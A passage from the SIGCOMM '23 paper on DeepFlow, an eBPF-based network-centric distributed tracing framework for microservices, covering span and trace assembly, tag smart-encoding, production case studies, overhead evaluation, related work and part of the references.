enter parameters in a hash\nmap, retrieves them at exit time, and combines them with the exit\nparameters. The combined data is referred to as message data , and\nits type is classified as ingress or egress based on the type of system\ncall captured. To decrease the amount of data transferred, we only\nprocess the first system call for a message, not the subsequent ones\nthat are used for further data transfers.\nIn the second phase, DeepFlow performs message protocol in-\nference and parses messages with their original semantics using\nrelevant network information. Specifically, after the message data\nhas been transferred to the user space, the DeepFlow Agent iter-\nates through the common protocol specifications [35,36,57,59,60,\n106,114] and the optional user-supplied protocol specifications , ex-\necuting a one-time protocol inference for each newly established\nconnection. Then, DeepFlow parses the payload to determine the\nrequest/response type of the message. Once type inference has\nFigure 6: Three phases of span construction procedure.\nbeen performed, the message data is prepared for use as either the\nstart or end of spans (Figure 1). Although deep packet inspection is\nunavoidable, DeepFlow as an open source project, typically only\nextracts information from the packet headers and does not examine\nthe sensitive user data primarily located in the payload.\nLast but not least, DeepFlow will try to aggregate one request\nand one response from the same flow into sessions . A session can be\nused to represent a span (Figure 1), where the request of the session\nis the start of the span and the response is the end. To accomplish\nsession aggregation, DeepFlow must take into account both pipeline\nand parallel application layer protocols. Pipeline protocols send\nand receive messages in a pipeline pattern, where the order of re-\nquests and responses for the same connection remains constant.\nTherefore, DeepFlow just needs to match the order between re-\nsponses and requests in the same flow . Parallel protocols, on the\nother hand, multiplex messages on the same connection. To ensure\nprecise correspondence, DeepFlow makes use of the embedded\ndistinguishing attributes in the message as originally defined by\nthe protocol (e.g., IDs in DNS headers [ 58] and stream identifiers\nin HTTP/2 headers [ 60]). To enable effective merging and address\nthe message disorder problem introduced by multiple CPU cores,\nDeepFlow implements a time window array and stores messages\naccording to their timestamps. When aggregating, only messages\nin the same time slot or next to it will be queried. Based on our\nproduction experience, DeepFlow presently sets the duration of\n7ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA Junxian Shen et al.\neach time slot to 60seconds. Messages received outside of the time\nperiod are uploaded to the DeepFlow Server, where they can be\naggregated again using the same technique.\n3.3.2 Trace Assembling. In order to generate complete traces, it\nis necessary to execute a final step on spans: trace assembling. Tak-\ning into account the need for instrumentation convenience ( Goal\n1), it is necessary to infer the causal relationship between intra-\ncomponent and inter-component in a non-intrusive manner. Using\nFigure 1 as an illustration, the solid arrow between spans 1and 2\nrepresents intra-component causality, whereas the solid arrow be-\ntween spans 2and 3represents inter-component causality. Existing\nresearch suggests using logs or system call stacks to non-intrusively\nassemble traces [ 72,136,139,140]. However, fuzziness in log seman-\ntics and call stack boundaries can affect the accuracy and coverage\nof tracing ( Goal 3 ). To address this challenge, DeepFlow determines\nthe relationships between spans by utilizing information across\ndifferent network layers saved during instrumentation. DeepFlow\ntakes the spans that users query as starting points and merges the\nassociated spans. Meanwhile, cross-layer correlation is supported\nby intra- and inter-component association as well as third-party\nspan integration ( Goal 4 ).\n(a) Implicit context propagation via thread\nIDs.\n(b) Using time sequences to partition\nthread-reusing spans.\n(c) Association for multiple requests or responses.\nFigure 7: Intra-component causal association.\nIntra-Component Association. Typically, a microservice com-\nponent may need to invoke other components after receiving a\nrequest, and vice versa. Therefore, DeepFlow must retain its rela-\ntionships within a thread without being aware of the underlying\nlogic. DeepFlow typically identifies intra-component causal rela-\ntionships between spans using thread IDs, time information, and\ninsight of scheduling. A same systrace_id is assigned to both\nof the spans that possess a causal association, which serves as a\nglobal unique identifier. Instead of injecting the systrace_id into\npackets, it is appended as an attribute to the message data of spans,\nwhich satisfies our non-intrusiveness requirements.\nFirst, DeepFlow associates spans within the same thread us-\ning thread IDs (Figure 7(a)). Due to the 1:1 relationship between\nthe kernel thread and user thread in the thread-based microservice\ncomponents, this association can be performed in the kernel. For\ncoroutines in Golang, DeepFlow can also conduct association by\ntracking the invocation relationships between coroutines duringexecution. Second, when threads are reused, the trace will be parti-\ntioned based on the time sequence (Figure 7(b)). Finally, DeepFlow\nneeds to handle multiple requests or responses (Figure 7(c)). The\nkey takeaway is that, for a single thread, computing does not (and\nshould not) yield to scheduling, whereas network communication does .\nConsequently, we label two consecutive messages of different types\nand from different sockets with the same systrace_id .\nCross-thread intra-component association is a notorious prob-\nlem due to the fact that users can pass packets between threads in\nways that are difficult to capture, such as memory copies and pa-\nrameter transfers. DeepFlow employs the fact that the microservice\ncomponent itself must maintain the intra-component association\nto circumvent this issue. For microservice components such as\nHAProxy [ 51], Envoy [ 110], and Nginx [ 32],DeepFlow utilizes its\noriginal capabilities to generate X-Request-IDs [ 50,102,111] for\nmessages, preserving the association of spans across threads.\nInter-Component Association. DeepFlow does not insert context\ninformation into messages, making it difficult to correlate across\nnetwork infrastructures, processes, and machines. Additionally,\ndevice-level spans gathered by cBPF [ 69] and AF_PACKET [ 84]\nmust be associated with relevant spans. Fortunately, since network\ntransmissions (Layer 2/3/4 forwarding) do not change the TCP\nsequence, DeepFlow leverages this for the inter-component associ-\nation. During the instrumentation phase (Section 3.2), we calculate\nand record the TCP sequence for each message in the kernel. It\nis then used to differentiate and maintain the inter-component\nassociation of spans within the same flow.\nThird-Party Span Integration. DeepFlow can incorporate spans\ngenerated from user-defined distributed tracing frameworks. For in-\nstance, by parsing the reserved header fields [ 104,105,129] used by\nOpenTelemetry in the message collected by DeepFlow , the context\ninformation of OpenTelemetry can be extracted.\nBottom-Up Trace Assembling. In the preceding phase, DeepFlow\ndoes not directly generate traces, but rather injects associations\nas tags into the message data and sessions. At present, DeepFlow\ndoes not consider the scenario where multiple messages are cached\nwithin a single data structure, thereby significantly simplifying the\nmapping of system calls to message data. Based on this assumption,\na thread can process only one message simultaneously. Hence,\nwe regard consecutive ingresses or egresses as system calls that\nare activated by the same message. This assumption indeed makes\nDeepFlow incapable of managing scenarios such as message queues.\nWe plan to tackle this problem in future work.\nAlgorithm 1 demonstrates the final step of trace assembling: iter-\natively aggregating spans using previously injected single-threaded\nintra-component information ( systrace_id s and pseudo-thread\nIDs), cross-threaded intra-component information (X-Request-IDs),\ninter-component information (TCP sequences), and third-party in-\nformation (trace IDs) in order to generate traces. Users can select\nspans that they are interested in, such as time-consuming invo-\ncations, as the starting points of the assembly procedure (Line 2).\nIn the first part of the algorithm, DeepFlow searches the database\nusing the user-specified iteration times (the default is 30). In each\niteration, we add to the span set any new spans that share the same\nsystrace_id (Line 6), pseudo-thread ID (Line 7), X-Request-ID\n8Network-Centric Distributed Tracing with DeepFlow ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA\n(Line 8), TCP sequence (Line 9), and trace ID (Line 10) as the cur-\nrent spans. The search is terminated if the number of related spans\ndoes not increase between two consecutive searches (Lines 13-14).\nIn the second phase of the algorithm, we iterate over the span\nset and set the parent spans. The determination of parent spans\nis also based on the aforementioned intra- and inter-component\nassociations, but with stricter conditions. We set 16rules based on\nthe collection location (server or client), start time and finish time,\nspan type, and message type (Line 20). For instance, if an eBPF\nspan collected on the client side has the same TCP sequence as an\neBPF span collected on the server side, the parent of the client side\nspan is set to the server side span. Finally, we sort the span set by\ntime and parent relationship (Line 25) to generate a display-friendly\ntrace and transmit it to the front end.\nAlgorithm 1 Iterative Trace Assembling Algorithm\nInput:𝑠𝑡𝑎𝑟𝑡 _𝑠𝑝𝑎𝑛 - User-Chosen Span, 𝐼- Iteration Times\nOutput:𝑇- Assembled Trace\n1:// Iterative Span Search\n2:𝑠𝑝𝑎𝑛 _𝑠𝑒𝑡←𝑆𝑒𝑡(𝑠𝑡𝑎𝑟𝑡 _𝑠𝑝𝑎𝑛)\n3:𝑓𝑖𝑙𝑡𝑒𝑟←{𝑖𝑑==𝑠𝑡𝑎𝑟𝑡 _𝑠𝑝𝑎𝑛.𝑖𝑑}\n4:for𝑖𝑡𝑒𝑟←1to𝐼do\n5:for𝑠←𝑠𝑝𝑎𝑛 _𝑠𝑒𝑡do\n6:𝑓𝑖𝑙𝑡𝑒𝑟←𝑓𝑖𝑙𝑡𝑒𝑟∪{𝑠𝑦𝑠𝑡𝑟𝑎𝑐𝑒 _𝑖𝑑==𝑠.𝑠𝑦𝑠𝑡𝑟𝑎𝑐𝑒 _𝑖𝑑}\n7:𝑓𝑖𝑙𝑡𝑒𝑟←𝑓𝑖𝑙𝑡𝑒𝑟∪{𝑝𝑠𝑒𝑢𝑑𝑜 _𝑡ℎ_𝑖𝑑==𝑠.𝑝𝑠𝑒𝑢𝑑𝑜 _𝑡ℎ_𝑖𝑑}\n8:𝑓𝑖𝑙𝑡𝑒𝑟←𝑓𝑖𝑙𝑡𝑒𝑟∪{𝑥_𝑟𝑒𝑞_𝑖𝑑==𝑠.𝑥_𝑟𝑒𝑞_𝑖𝑑}\n9:𝑓𝑖𝑙𝑡𝑒𝑟←𝑓𝑖𝑙𝑡𝑒𝑟∪{𝑡𝑐𝑝_𝑠𝑒𝑞==𝑠.𝑡𝑐𝑝 _𝑠𝑒𝑞}\n10:𝑓𝑖𝑙𝑡𝑒𝑟←𝑓𝑖𝑙𝑡𝑒𝑟∪{𝑡𝑟𝑎𝑐𝑒 _𝑖𝑑==𝑠.𝑡𝑟𝑎𝑐𝑒 _𝑖𝑑}\n11: end for\n12:𝑠𝑝𝑎𝑛 _𝑠𝑒𝑡=𝑠𝑒𝑎𝑟𝑐ℎ _𝑑𝑎𝑡𝑎𝑏𝑎𝑠𝑒(𝑓𝑖𝑙𝑡𝑒𝑟)\n13: ifspan_set.not_update then\n14:𝐵𝑟𝑒𝑎𝑘\n15: end if\n16:end for\n17:// Set Parent for Each Span\n18:for𝑠←𝑠𝑝𝑎𝑛 _𝑠𝑒𝑡do\n19: for𝑟_𝑠←𝑠.𝑟𝑒𝑙𝑎𝑡𝑒𝑑 _𝑠𝑝𝑎𝑛𝑠()do\n20: if𝑟𝑒𝑙𝑎𝑡𝑒𝑑 _𝑠.𝑖𝑠_𝑝𝑎𝑟𝑒𝑛𝑡(𝑠)then\n21:𝑠.𝑠𝑒𝑡_𝑝𝑎𝑟𝑒𝑛𝑡(𝑟𝑒𝑙𝑎𝑡𝑒𝑑 _𝑠)\n22: end if\n23: end for\n24:end for\n25:𝑇←𝑠𝑝𝑎𝑛 _𝑠𝑒𝑡.𝑠𝑜𝑟𝑡()\n26:Return𝑇\n3.4 Tag-Based Correlation\nTo achieve cross-component correlation in zero code ,DeepFlow\ninjects uniform tags into the spans ( Goal 4 ). We enable the in-\njection of Kubernetes resource tags [ 73] (e.g., node, service, pod,\netc.), self-defined labels [ 73] (e.g., version, commit-ID, etc.), and\ncloud resource tags [ 9,30] (e.g., region, availability zone, VPC, etc.).\nUsers can use these tags to immediately determine the locations\nof the problems, such as in which pod the invocations are time-\nconsuming. These tags also connect tracing and metrics, allowingDeepFlow to integrate them. When querying traces, users can simul-\ntaneously view the related metrics data generated from frameworks\nlike Prometheus [112]. Note that during tag-based correlation, we\ndo not modify the original packets, and tag injection is performed\noff-path on the data collected by DeepFlow .\nHowever, in a typical production environment, up to 100tags\nmight be related to a single trace. To minimize the overhead, we\nintroduce a technique called smart-encoding.\nFigure 8: Integrate resource tags with smart-encoding.\n⋆Design 4: Smart-encoding based on phased tag injection.\nAs demonstrated in Figure 8, DeepFlow divides the tag injection\nprocess into two phases: tag collection andsmart-encoding . During\nthe tag collection phase, DeepFlow Agents inside the cluster will\ncollect Kubernetes tags ( ➀) and send them to the Server ( ➁), while\nthe cloud resource tags are gathered directly by the Server ( ➂). In\nthe smart-encoding phase, DeepFlow only injects virtual private\ncloud (VPC) tags and IP tags in Intformat into traces ( ➃-➅). The\nServer then injects the resource tags in Intformat into the traces\nbased on the VPC/IP tags and stores them in the database ( ➆). At\nquery time, DeepFlow Server determines the relationship between\nself-defined tags and resource tags, injects self-defined tags into\ntraces, and then uploads the traces with all the tags to the front end\n(➇). By partitioning the tag injection phases, DeepFlow reduces the\ncalculation, transmission, and storage overhead.\n4DEEPFLOW IN PRODUCTION\nDeepFlow has served dozens of companies in the years since it\nwent into production. Simultaneously, we will make DeepFlow\npublicly available and aim to develop a substantial open-source\ncommunity. In this section, we show the performance of DeepFlow\nin the production environment.\nFigure 9 demonstrates the results of the target interviews with\nten commercial customers1.All of the participants are Fortune Global\n500 companies and have tens of thousands of employees. Without\nusing DeepFlow ,60% of the users must spend hours or days in-\nstrumenting a single component. For 30% of the customers, the\nburden of modifying hundreds of lines of code per component is\n1The original data from the questionnaire is included in Appendix C.\n9ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA Junxian Shen et al.\n(a) Time spent on instrumentation.\n (b) Lines of code that need to be modified\nfor instrumentation.\nFigure 9: Instrumentation efforts without DeepFlow .\n(a) Time spent locating the perfor-\nmance problems.\n(b) Primary advantages of utilizing DeepFlow as\nreported by users.\nFigure 10: DeepFlow ’s contribution in production cases.\noverwhelming. DeepFlow , on the other hand, eliminates instrumen-\ntation efforts through automatic, non-intrusive instrumentation.\nWithout manual instrumentation, developers can retrieve traces by\ndeploying DeepFlow in the cluster.\nFigure 10(a) emphasizes that DeepFlow can indeed shorten the\ntime required for locating performance issues. As a result of the\ncoverage and correlation abilities, users do not have to manually\ncapture network metrics or check the status of network infras-\ntructure. With DeepFlow , operators can pinpoint and identify the\nroot cause in a fraction of the time it would take otherwise. Our\nuser questionnaire confirms this (Figure 10(b)). Five out of ten con-\nsumers acknowledge that network coverage is one of the reasons\nthat motivate them to employ DeepFlow . Four users find the non-\nintrusive instrumentation helpful. Three users believe the tracing\nof closed-source components to be one of DeepFlow ’s benefits.\n4.1 Representative Real-World Examples\nNext, we demonstrate the out-of-the-box tracing andrapid problem\nlocation capabilities of our system. We provide three representative\nreal-world examples that highlight the practical use of DeepFlow ’s\nusability ,network-side coverage , and correlation capabilities ,\nrespectively. In Appendix A, we present DeepFlow ’s comprehensive\ntraces from end-hosts to gateways as requests traverse the data\ncenter. DeepFlow currently supports rapid deployment in a single\nor across multiple Kubernetes clusters [ 37] via Helm [ 53], without\nrequiring administrators to install any kernel modules or libraries.\nDeepFlow can be operated continuously to monitor a microservice\nover an extended period of time, or on demand in the event of a\nperformance anomaly, as shown in the examples below.\n4.1.1 Performance Debugging During Execution. Nginx [ 32] is\na typical reverse proxy server that plays a critical role in data for-\nwarding. In this case, the client encountered a timeout on a specific\nendpoint, which turned out to be an error in Nginx. Although the\nsource of the timeout seems obvious in retrospect, the client spent\nan entire day unable to discover the issue using existing tools. In\na rush, the developers did not instrument every component, and\nthe invocation path was full of blind spots.\nFigure 11: The operators employed DeepFlow in an on-the-\nfly production environment to pinpoint the failure source: a\npod hosting Nginx Ingress Control.\nTherefore, the user leverages DeepFlow tolocate the anomalies\nduring the execution of the online system (Figure 11). Without mod-\nifying a single line of code , operators deploy DeepFlow while\nthe service is active and obtain hop-by-hop network data in the\ntraces collected. Within 15 minutes , the root cause is identified:\none of the pods hosting Nginx Ingress Control in the cluster has an\nerror, thus returning a 404 status code.\n4.1.2 Accurate Diagnosis of Network Infrastructure Anomalies.\nIn this example, newly installed Pods by an e-commerce service\nhave a high risk of network inaccessibility to the gateway or other\nbusiness services. Users have to wait between 20and 120minutes\nfor communication to resume. This has a significant influence on\nthe robustness of the service. Operators used various tools for\nseveral months to determine that an extra ARP request had been\ngenerated during the connection. Unfortunately, they were unable\nto determine where the extra ARP request originated.\nDeepFlow resolves this issue by providing network coverage ,\nwhich is lacking in other distributed tracing frameworks. Using\nDeepFlow , operators traverse the traces and inspect the number\nand status of ARP requests at each network infrastructure. After\nruling out problems in the containers, virtual machines, and vir-\ntual switches, we discover that the redundant ARP requests are\ngenerated by a malfunctioning physical NIC.\nFigure 12: Locating the performance anomaly within one\nminute using DeepFlow .\n4.1.3 Cooperative Debugging Based on Network Metrics and Dis-\ntributed Traces. A customer reported that their online service sys-\ntem has experienced frequent service latency increases and con-\nnection terminations. Operators spent six hours debugging using\nexisting observability tools. But they only identified the application-\nlevel spans that were affected.\nCross-layer correlation distinguishes DeepFlow from other trac-\ning frameworks. Figure 12 shows the fault-locating procedure. With\nmetric-by-metric analysis of some specific traces, users found in\none minute that the queue backlog of RabbitMQ [ 128] was caus-\ning the TCP connection resets, which led to the aforementioned\nnetwork problems. Without the capacity to correlate, network an-\nalyzers cannot extract the related information from the vast vol-\nume of data, and distributed tracing can only obtain the affected\napplication-level spans.\n10Network-Centric Distributed Tracing with DeepFlow ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA\n(a) Per-event eBPF instrumentation over-\nhead. tpstands for tracepoint.\n(b) Overhead of each instrumentation\npoints in DeepFlow .\nFigure 13: Instrumentation overhead of DeepFlow .\n5 TESTBED EVALUATION\nIn this section, we thoroughly evaluate the performance of Deep-\nFlow and answer the following questions:\n•Is the trace collection overhead of DeepFlow negligible?\n(Section 5.1)\n•How many resources does DeepFlow ’s smart-encoding save\nwhen storing traces? (Section 5.2)\n•How long does the trace assembling procedure take for a\nuser to perform a high-level query? (Section 5.3)\n•What is the end-to-end performance of DeepFlow ? (Sec-\ntion 5.4)\nWe conduct the experiments using a three-node Kubernetes [ 37]\ncluster testbed (version 1.24) with standard configurations [ 109].\nThe cluster consists of three identical servers with Intel Xeon E5-\n2620 v3 CPUs (2.40 GHz, 12 physical cores) and 128 GB of total\nRAM. Ubuntu 20.04 is installed on the server, along with kernel\nversion 5.4.0. To avoid testing errors, we run each test several times\nand select the median.\n5.1 Trace Collection Overhead\nIn this experiment, we measure the trace collection overhead of\nDeepFlow Agent. We begin by deploying an empty eBPF program to\nget the theoretical minimum system overhead. Then, we repeatedly\ninvoke 100,000system calls and calculate the average execution\ntime before and after deploying the DeepFlow Agent2.\nFigure 13 shows that extra latency ranging from 277𝑛𝑠to889𝑛𝑠\nis introduced to pre-defined ABIs. Notably, an ABI will trigger both\nenter and exit hooks, and DeepFlow only adds a latency of no more\nthan 588𝑛𝑠to each system call in addition to the inherent over-\nhead. This overhead is negligible for I/O ABIs that are particularly\ntime-consuming. Extension hooks such as ssl_read ,uprobe , and\nuretprobe themselves incur a latency of 6153𝑛𝑠. In comparison,\nDeepFlow ’s additional latency is maintained below 423𝑛𝑠.\n5.2 Effectiveness of Smart-Encoding\nNext, we quantify the resources that the smart-encoding method\nsaves during trace storage. It is compared to both direct storing\nand low-cardinality [ 19] encoding techniques. For each test, 107\nsynthetic traces are inserted into the database [ 18] at a rate of 2∗105\nrows per second. We use pidstat [85] to determine the resources\n2We also measure the performance impact of DeepFlow Agent on the monitored\ncomponents (see Appendix B).\nFigure 14: Trace storage re-\nsource consumption.\nFigure 15: User query delay of\nspans and traces.\nutilized during the storage of traces and establish DeepFlow as the\nbaseline. The results are shown in Figure 14.\nSmart-encoding enables DeepFlow to utilize only 0.11CPU cores,\n1.39%of the host RAM (about 800MB), and approximately 1.4GB of\ndisk space during the storage procedure. Direct insertion requires\n4.31times more CPU, 1.97times more memory, and 3.9times more\ndisk space than DeepFlow . This is due to the fact that storing a tag\nas a string requires more bytes (one char per digit) and thus more\ncalculation and hardware resources than converting it to an integer\nbeforehand. Compared to direct insertion, low-cardinality provides\na more efficient encoding method. However, it still requires 1.94\ntimes more storage resources than DeepFlow . In the meantime, low-\ncardinality uses 2.14times as much memory and 7.79times as much\nCPU as DeepFlow . By smart-encoding, DeepFlow considerably\ndecreases the overhead associated with trace storage, ensuring that\nthe back end does not consume an excessive amount of cluster\nresources.\n5.3 Query Delay\nWe simulate the user’s query behavior to evaluate DeepFlow ’s back-\nend capabilities. First, we use load generators to create sufficient\nspans and traces. Both the span list query test and the trace query\ntest are then conducted twice: once sequentially and once randomly.\nAs the purpose of this experiment is to evaluate the performance\nof the procedure for trace assembly, user queries are generated via\nserial calls during testing. The time range for span list queries is\nset to 15minutes. Figure 15 illustrates the results. DeepFlow can\nquery a single trace in about 1second and search a 15-minute span\nlist in approximately 0.06seconds.\n5.4 End-to-End Performance\nThe objective of our end-to-end test is to evaluate the performance\nimpact of DeepFlow on real-world microservices. We choose the\nSpring Boot demo [ 12] and the Istio Bookinfo application [ 61] as\nthe target services. First, we deploy these microservices without\ntracing tools and record the relationship between throughput and\nlatency as the baseline. Then, we reevaluate their performance after\ninstalling Zipkin [ 141], Jaeger [ 62], or DeepFlow . The results are\nshown in Figure 16.\nThe throughput of the Spring Boot demo without deploying\ntracing tools is approximately 1,420requests per second (RPS).\nAfter deploying Jaeger and DeepFlow , the throughput decreases to\n1,360RPS and 1,320RPS, with 4%and 7%overhead. For the Istio\nBookinfo demo, Zipkin and DeepFlow reduce the throughput from\n670RPS to 650RPS ( 3%) and 640RPS ( 4.5%), respectively. Note\nthat, Jaeger only constructs 4spans for a single trace, while Zipkin\n11ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA Junxian Shen et al.\n(a) End-to-end performance evaluation of Spring Boot demo.\n(b) End-to-end performance evaluation of Istio bookinfo application.\nFigure 16: End-to-end performance evaluation.\nproduces 6. In comparison, DeepFlow creates 18and 38spans per\ntrace for these two applications. The performance of DeepFlow is\njust marginally inferior to the other tracing tools, with an overhead\nof no more than 7%but significantly more spans per trace.\n6 RELATED WORK\nObservability Tools. Classic works, such as Magpie [ 10], Who-\ndunit [ 14], X-trace [ 34], Dapper [ 121], and Pinpoint [ 101], laid the\nfoundation for observability. Recent studies take steps further as\ndistributed systems evolve. Pivot Tracing [ 92] and Panorama [ 56]\nemphasize breaking application boundaries by piggybacking met-\nrics along the request flow and exchanging logs from caller to callee,\nrespectively. [ 91] decouples intrusive context propagation and cross-\ncutting tool logic. OpenTelemetry [ 103] standardizes data-collection\nAPIs, instrumentation libraries, and semantic conventions. Canopy\n[64], addresses the granularity mismatch between operator analy-\nsis and raw traces, presents a general event-based tracing model,\nand supports deep customization for users. As the volume of mon-\nitored data explodes, a large body of work focuses on data filter-\ning [ 7,26,77,78,88,126] and overhead reduction [ 75,119,134].\nSome other research performs data analysis in areas including per-\nformance profiling [ 54,55,95], performance diagnosis [ 96,117],\nfailure diagnosis [79, 107], and root cause analysis [132, 138].\nAutomatic Trace Collection. Existing work contributes in three\nways to the development of a user-friendly automatic tracing frame-\nwork. The first category utilizes automatic code insertion [ 56,63,\n81,92,115,131]. For example, [ 131] adds a parameter in each func-\ntion to propagate global context in Golang. Domino [ 81] interposes\ncallback registration in JavaScript for event chain construction. The\nsecond category leverages existing logs to track causal relation-\nships. Lprof [ 140] statically analyzes the application bytecode to\naid runtime log-based flow construction. CloudSeer [ 136] builds an\nautomaton for each task by extracting sequential features from logs.\nStitch [ 139] generates a system stack structure ( 𝑆3) graph using theidentifiers of objects in logs. TS [ 15] focuses on online real-time log\nsessionization with high throughput and low overhead. The third\ncategory employs kernel-level tools. PreciseTracer [ 118] builds a\nLOG_TRACE kernel module; Sieve [ 126] employs sysdig [ 124]; [47]\nuses LTTng [ 87]; and IntroPerf [ 72] utilizes ETW [ 98]. However,\nnone of them can simultaneously achieve out-of-the-box, stable,\nand precise trace collection as provided by DeepFlow .\neBPF. eBPF has been applied in areas including network optimiza-\ntion [ 1,127], network virtualization [ 3,11], and network secu-\nrity [ 24,25]. For instance, InKeV [ 1] enables the in-kernel pro-\ngrammability of virtualized network functions. ExtFUSE [ 11] boosts\nuser file system performance by registering request handlers into\nthe kernel. FineLame [ 24] tracks resource utilization via eBPF for\nasymmetric Denial-of-Service attack detection.\nRecent research has made some attempts to improve observabil-\nity with eBPF [ 31,41,80,86,123]. None of them, however, handles\nthe intricate communication interactions in microservice scenarios.\nVNetTracer [ 123] aggregates metrics collected via eBPF and pro-\nfiles network performance in complex virtualized systems. CaT [ 31]\nemploys eBPF to analyze content similarity and focuses on con-\ntexts such as big data analytics with basic communication models.\nPixie [ 74] and Cilium Hubble [ 17] are two important works that\ntry to solve problems with microservice observability. However,\nup until the point of writing this paper, they have not been able\nto achieve end-to-end distributed tracing. In these frameworks, L4\nand L7 metrics, requests, and responses are extracted individually.\n7 CONCLUSION\nIn this paper, we introduce DeepFlow , a network-centric distributed\ntracing framework for microservice scenarios. First, to overcome\nthe usability issues and the lack of network information, DeepFlow\nestablishes a network-centric tracing plane with eBPF in the ker-\nnel. With kernel privileges, it can collect network metrics across\nmultiple layers and eliminate blind spots in network infrastructure\nand closed-source components. Second, we utilize the collected\nnetwork metrics for implicit context propagation. This technique,\nin conjunction with the hook-based instrumentation method, en-\nables users to perform distributed tracing in zero code. Last but not\nleast, DeepFlow develops the smart-encoding technique to reduce\ntag storage overhead. DeepFlow , based on our production experi-\nence, can save users hours of instrumentation efforts. Moreover,\nit reduces troubleshooting time from several hours to only a few\nminutes with the aid of enhanced network knowledge. Testbed\nevaluations show that DeepFlow has a negligible overhead of no\nmore than 7%.\nAll real-world use cases and questionnaires were anonymized\nand gathered with the consent of the participants. This work does\nnot raise any ethical issues.\nACKNOWLEDGMENTS\nWe thank anonymous SIGCOMM reviewers for their valuable com-\nments. We thank engineers from Yunshan Networks for their gen-\nuine help. The research is supported by the National Natural Science\nFoundation of China under Grant No. 62002009 and No. 62102020.\nThis work is part of Future Internet Technology Infrastructure\n(FITI).\n12Network-Centric Distributed Tracing with DeepFlow ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA\nREFERENCES\n[1]Zaafar Ahmed, Muhammad Hamad Alizai, and Affan A. Syed. 2018. InKeV:\nIn-Kernel Distributed Network Virtualization for DCN. SIGCOMM Comput.\nCommun. Rev. 46, 3, Article 4 (jul 2018), 6 pages. https://doi.org/10.1145/3243157.\n3243161\n[2]Meta AI. 2022. Pytorch - Tensors and Dynamic neural networks in Python with\nstrong GPU acceleration. (Nov. 2022). https://pytorch.org/\n[3]Nadav Amit and Michael Wei. 2018. The Design and Implementation of Hyper-\nupcalls. In Proceedings of the 2018 USENIX Conference on Usenix Annual Technical\nConference (USENIX ATC ’18) . USENIX Association, USA, 97–111.\n[4]Apache. 2022. Apache Hadoop project. (Nov. 2022). https://hadoop.apache.org/\n[5]Apache. 2022. Apache Spark - Unified engine for large-scale data analytics.\n(Nov. 2022). https://spark.apache.org/\n[6]Apache. 2023. Apache SkyWalking. (July 2023). Retrieved Jul, 2023 from\nhttps://skywalking.apache.org/\n[7]Emre Ates, Lily Sturmann, Mert Toslali, Orran Krieger, Richard Megginson,\nAyse K. Coskun, and Raja R. Sambasivan. 2019. An Automated, Cross-Layer\nInstrumentation Framework for Diagnosing Performance Problems in Dis-\ntributed Applications. In Proceedings of the ACM Symposium on Cloud Computing\n(SoCC ’19) . Association for Computing Machinery, New York, NY, USA, 165–170.\nhttps://doi.org/10.1145/3357223.3362704\n[8]AWS. 2023. AWS Lambda, Run code without thinking about servers or clusters.\n(Jan. 2023). https://aws.amazon.com/lambda/\n[9]AWS. 2023. Tagging AWS resources. (Jan. 2023). https://docs.aws.amazon.com/\ngeneral/latest/gr/aws_tagging.html\n[10] Paul Barham, Rebecca Isaacs, Richard Mortier, and Dushyanth Narayanan. 2003.\nMagpie: Online Modelling and Performance-Aware Systems. In Proceedings of\nthe 9th Conference on Hot Topics in Operating Systems - Volume 9 (HOTOS’03) .\nUSENIX Association, USA, 15.\n[11] Ashish Bijlani and Umakishore Ramachandran. 2019. Extension Framework\nfor File Systems in User Space. In Proceedings of the 2019 USENIX Conference\non Usenix Annual Technical Conference (USENIX ATC ’19) . USENIX Association,\nUSA, 121–134.\n[12] Spring Boot. 2023. Jaeger Demo. (Jan. 2023). https://github.com/chanjarster/\nspring-boot-istio-jaeger-demo\n[13] Peter Bourgon. 2017. Metrics, tracing, and logging. (Feb. 2017). https://peter.\nbourgon.org/blog/2017/02/21/metrics-tracing-and-logging.html\n[14] Anupam Chanda, Alan L. Cox, and Willy Zwaenepoel. 2007. Whodunit: Trans-\nactional Profiling for Multi-Tier Applications. SIGOPS Oper. Syst. Rev. 41, 3 (mar\n2007), 17–30. https://doi.org/10.1145/1272998.1273001\n[15] Zaheer Chothia, John Liagouris, Desislava Dimitrova, and Timothy Roscoe.\n2017. Online Reconstruction of Structural Information from Datacenter Logs.\nInProceedings of the Twelfth European Conference on Computer Systems (EuroSys\n’17). Association for Computing Machinery, New York, NY, USA, 344–358. https:\n//doi.org/10.1145/3064176.3064195\n[16] Michael Chow, David Meisner, Jason Flinn, Daniel Peek, and Thomas F. Wenisch.\n2014. The Mystery Machine: End-to-End Performance Analysis of Large-Scale\nInternet Services. In Proceedings of the 11th USENIX Conference on Operating Sys-\ntems Design and Implementation (OSDI’14) . USENIX Association, USA, 217–231.\n[17] Cilium. 2022. Hubble - Network, Service & Security Observability for Kubernetes\nusing eBPF. (July 2022). Retrieved Feb, 2023 from https://github.com/cilium/\nhubble\n[18] ClickHouse. 2023. Database. (Jan. 2023). https://clickhouse.com/\n[19] ClickHouse. 2023. LowCardinality. (Jan. 2023). https://clickhouse.com/docs/en/\nsql-reference/data-types/lowcardinality/\n[20] Open Zipkin Community. 2023. Zipkin tracing library for Python and C++. (Jan.\n2023). https://github.com/dulikvor/cppKin\n[21] CoreDNS. 2022. CoreDNS: DNS and Service Discovery. (Nov. 2022). https:\n//coredns.io/\n[22] Oracle Corporation. 2022. MySQL. (Nov. 2022). https://www.mysql.com\n[23] DataDog. 2023. eBPF manager. This manager helps handle the life cycle of your\neBPF programs. https://github.com/DataDog/ebpf-manager. (July 2023).\n[24] Henri Maxime Demoulin, Isaac Pedisich, Nikos Vasilakis, Vincent Liu,\nBoon Thau Loo, and Linh Thi Xuan Phan. 2019. Detecting Asymmetric\nApplication-Layer Denial-of-Service Attacks in-Flight with Finelame. In Pro-\nceedings of the 2019 USENIX Conference on Usenix Annual Technical Conference\n(USENIX ATC ’19) . USENIX Association, USA, 693–707.\n[25] Luca Deri, Samuele Sabella, and Simone Mainardi. 2019. Combining System\nVisibility and Security Using eBPF. In Proceedings of the Third Italian Conference\non Cyber Security . CEUR-WS.org, Italy, 1–12.\n[26] Rui Ding, Hucheng Zhou, Jian-Guang Lou, Hongyu Zhang, Qingwei Lin, Qiang\nFu, Dongmei Zhang, and Tao Xie. 2015. Log2: A Cost-Aware Logging 